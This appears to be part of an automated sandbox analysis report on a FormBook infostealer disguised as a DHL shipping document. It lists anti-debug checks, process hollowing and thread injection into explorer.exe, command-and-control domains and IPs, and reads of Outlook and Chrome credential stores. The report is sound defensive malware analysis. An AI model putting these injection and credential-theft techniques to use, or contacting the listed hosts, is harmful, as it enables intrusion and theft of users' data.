          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AA6CF0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AA6CF0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]3_2_00AF8CD6
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h]3_2_00A5BC2C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]3_2_00AF740D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]3_2_00AF740D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]3_2_00AF740D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h]3_2_00A4746D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h]3_2_00A5A44B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]3_2_00ABC450
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]3_2_00ABC450
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]3_2_00AF05AC
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]3_2_00AF05AC
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h]3_2_00A535A1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]3_2_00A51DB5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]3_2_00A51DB5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]3_2_00A51DB5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]3_2_00A5FD9B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]3_2_00A5FD9B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A3D5E0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A3D5E0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]3_2_00AD8DF1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h]3_2_00A2AD30
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]3_2_00A33D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h]3_2_00AF8D34
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h]3_2_00AAA537
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]3_2_00A54D3B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]3_2_00A54D3B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]3_2_00A54D3B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]3_2_00A4C577
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]3_2_00A4C577
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h]3_2_00A63D43
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h]3_2_00AA3540
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h]3_2_00A47D50
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AF0EA5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AF0EA5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AF0EA5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h]3_2_00AA46A7
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABFE87 mov eax, dword ptr fs:[00000030h]3_2_00ABFE87
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A376E2 mov eax, dword ptr fs:[00000030h]3_2_00A376E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A516E0 mov ecx, dword ptr fs:[00000030h]3_2_00A516E0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A68EC7 mov eax, dword ptr fs:[00000030h]3_2_00A68EC7
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A536CC mov eax, dword ptr fs:[00000030h]3_2_00A536CC
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]3_2_00ADFEC0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]3_2_00AF8ED6
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2E620 mov eax, dword ptr fs:[00000030h]3_2_00A2E620
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ADFE3F mov eax, dword ptr fs:[00000030h]3_2_00ADFE3F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]3_2_00A2C600
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]3_2_00A2C600
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]3_2_00A2C600
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A58E00 mov eax, dword ptr fs:[00000030h]3_2_00A58E00
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE1608 mov eax, dword ptr fs:[00000030h]3_2_00AE1608
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h]3_2_00A5A61C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h]3_2_00A5A61C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3766D mov eax, dword ptr fs:[00000030h]3_2_00A3766D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]3_2_00A4AE73
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]3_2_00A4AE73
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]3_2_00A4AE73
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]3_2_00A4AE73
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]3_2_00A4AE73
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]3_2_00A37E41
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]3_2_00A37E41
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]3_2_00A37E41
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]3_2_00A37E41
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]3_2_00A37E41
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]3_2_00A37E41
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h]3_2_00AEAE44
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h]3_2_00AEAE44
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A38794 mov eax, dword ptr fs:[00000030h]3_2_00A38794
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]3_2_00AA7794
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]3_2_00AA7794
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]3_2_00AA7794
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A637F5 mov eax, dword ptr fs:[00000030h]3_2_00A637F5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h]3_2_00A24F2E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h]3_2_00A24F2E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5E730 mov eax, dword ptr fs:[00000030h]3_2_00A5E730
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h]3_2_00AF070D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h]3_2_00AF070D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h]3_2_00A5A70E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h]3_2_00A5A70E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4F716 mov eax, dword ptr fs:[00000030h]3_2_00A4F716
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h]3_2_00ABFF10
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h]3_2_00ABFF10
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3FF60 mov eax, dword ptr fs:[00000030h]3_2_00A3FF60
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF8F6A mov eax, dword ptr fs:[00000030h]3_2_00AF8F6A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3EF40 mov eax, dword ptr fs:[00000030h]3_2_00A3EF40
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040CEC3 LdrLoadDll,3_2_0040CEC3
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_004018F8 SetUnhandledExceptionFilter,1_2_004018F8
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040636B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00401BF3
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401796

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.195.203 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 37.97.254.29 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.getpay.life
          Source: C:\Windows\explorer.exeNetwork Connect: 46.23.69.44 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.luxgudonu.store
          Source: C:\Windows\explorer.exeDomain query: www.motherhoodinthegarden.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.32 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.28.110 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sowmedia.site
          Source: C:\Windows\explorer.exeDomain query: www.363ww.top
          Source: C:\Windows\explorer.exeDomain query: www.espisys-technology.com
          Source: C:\Windows\explorer.exeDomain query: www.on-smooth.com
          Source: C:\Windows\explorer.exeDomain query: www.yh78898.com
          Source: C:\Windows\explorer.exeDomain query: www.versicherungsgott.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.233.254.113 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.88 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 113.52.135.193 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 3B0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeJump to behavior
          Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.333026756.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.580769030.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.324681730.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.325681102.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581325159.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_00401A05 cpuid 1_2_00401A05
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_0040167D
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
